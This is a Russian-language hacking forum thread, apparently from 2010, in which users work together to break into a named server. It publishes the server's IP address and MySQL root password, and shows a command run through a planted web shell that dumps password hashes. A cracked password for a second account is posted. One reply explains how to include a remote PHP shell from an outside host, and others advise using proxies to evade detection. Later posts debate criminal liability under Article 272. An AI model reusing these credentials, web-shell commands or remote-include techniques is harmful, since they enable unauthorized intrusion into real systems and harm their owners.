[Ссылки могут видеть только зарегистрированные пользователи. ]
Нашел там пароль к мускулю и дальше нечего неполучается. Плиз ктонить раскажите подробнее на примере этого сервера как дальше действовать чтобы получить доступ к БД.
necros555 поскольку я еще немогу отсылать личные сообщения то оставлю тут данные. Кароч их ип 216.245.218.197. Логин мускуля root, пароль l2ct2v1. Еще нашол где там папка мускуля лежит но дальше несмог командами описаными в теме его запустить. Если ктото сможет дальше меня дойти просьба отписаться в теме.
necros555 поскольку я еще немогу отсылать личные сообщения то оставлю тут данные. Кароч их ип 216.245.218.197. Логин мускуля root, пароль l2ct2v1. Еще нашол где там папка мускуля лежит но дальше несмог командами описаными в теме его запустить. Если ктото сможет дальше меня дойти просьба отписаться в теме.
там локалхост, я тут давно уже побывал ('common.php' 07/03/2010)
Все там получается, команда cmd=c:\Arquiv~1\MySQL\MYSQLS~1.0\bin\mysql.exe -uroot -pl2ct2v1 mysql -e "select * from user" возвращает такой результат
Код:
Host User Password Select_priv Insert_priv Update_priv Delete_priv Create_priv Drop_priv Reload_priv Shutdown_priv Process_priv File_priv Grant_priv References_priv Index_priv Alter_priv Show_db_priv Super_priv Create_tmp_table_priv Lock_tables_priv Execute_priv Repl_slave_priv Repl_client_priv Create_view_priv Show_view_priv Create_routine_priv Alter_routine_priv Create_user_priv Event_priv Trigger_priv ssl_type ssl_cipher x509_issuer x509_subject max_questions max_updates max_connections max_user_connections
localhost root *7335A175F3C5359C140251429975DBC6E9F44921 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y 0 0 0 0
% roott *42AB34A073BC13108C7AA8786ABBF6789B830FB0 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y 0 0 0 0
Как видно, пользователя два. Один - root, доступ только с локалхоста. Второй - roott, доступ со всех ипов, но пасс не известен Это либо уже кто-то побывал тут, и сделал для себя юзера. Либо админ изначально для себя делал, что маловероятно.
Последний раз редактировалось 6a4a; 09.03.2010 в 10:17.
Все там получается, команда cmd=c:\Arquiv~1\MySQL\MYSQLS~1.0\bin\mysql.exe -uroot -pl2ct2v1 mysql -e "select * from user" возвращает такой результат
Код:
Host User Password Select_priv Insert_priv Update_priv Delete_priv Create_priv Drop_priv Reload_priv Shutdown_priv Process_priv File_priv Grant_priv References_priv Index_priv Alter_priv Show_db_priv Super_priv Create_tmp_table_priv Lock_tables_priv Execute_priv Repl_slave_priv Repl_client_priv Create_view_priv Show_view_priv Create_routine_priv Alter_routine_priv Create_user_priv Event_priv Trigger_priv ssl_type ssl_cipher x509_issuer x509_subject max_questions max_updates max_connections max_user_connections
localhost root *7335A175F3C5359C140251429975DBC6E9F44921 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y 0 0 0 0
% roott *42AB34A073BC13108C7AA8786ABBF6789B830FB0 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y 0 0 0 0
Как видно, пользователя два. Один - root, доступ только с локалхоста. Второй - roott, доступ со всех ипов, но пасс не известен Это либо уже кто-то побывал тут, и сделал для себя юзера. Либо админ изначально для себя делал, что маловероятно.
6а4а, что писать в теле файла, чтоб посредством его подключить внешний шел?
Использовать как shell.php?src=www.faka.narod.ru/shell2.php
внешний инклуд частенько запрещен, либо в настройках сервера, либо хостером. Если внешний инклюд не проходит, попробуй подцепть локальный пхп-скрипт, что б проверить работает ли вообще твой скрипт Локальный путь указывается относительно твоего шелла.
Как видно, пользователя два. Один - root, доступ только с локалхоста. Второй - roott, доступ со всех ипов, но пасс не известен Это либо уже кто-то побывал тут, и сделал для себя юзера. Либо админ изначально для себя делал, что маловероятно.
Пароль юзера roott: owned
Неужели не догадаются сначала проверить свой пароль по хеш базам.. Судя по паролю действительно кто то побывал
Последний раз редактировалось Xacan; 10.03.2010 в 06:44.
если за этим делом тебя спалят(за дефейс сайта через иньекцию и заливку шелла на сервер и получения доступа к базе данных)-примерно дадут 2 года
поэтому при взломе юзайте прокси
если за этим делом тебя спалят(за дефейс сайта через иньекцию и заливку шелла на сервер и получения доступа к базе данных)-примерно дадут 2 года
поэтому при взломе юзайте прокси
на всех проксях (если это не взломаный серв и там спец не повесили шел для пользования) все движения логируются, так что тоже мало кому поможет
если за этим делом тебя спалят(за дефейс сайта через иньекцию и заливку шелла на сервер и получения доступа к базе данных)-примерно дадут 2 года
поэтому при взломе юзайте прокси
вор пойдет заявлять на вора? гфш сами собой нарушение так что лажа это все
вор пойдет заявлять на вора? гфш сами собой нарушение так что лажа это все
А как же GPL? Ява сервера не попадают под статью.
Да по сути неважно что ты ломал, какой сервер и что он нарушал. После того как ты получил доступ на чужой компьютер ты уже попадаешь под статью.
"Неправомерный доступ к компьютерной информации (ст. 272 УК) Статья 272 УК предусматривает ответственность за неправомерный доступ к компьютерной информации (информации на машинном носителе, в ЭВМ или сети ЭВМ), если это повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы вычислительных систем. Данная статья защищает право владельца на неприкосновенность информации в системе. Владельцем информационной вычислительной системы может быть любое лицо, правомерно пользующееся услугами по обработке информации как собственник вычислительной системы (ЭВМ, сети ЭВМ) или как лицо, приобретшее право использования компьютера."
________________
• Debugged programm was unable to process exception. Terminating...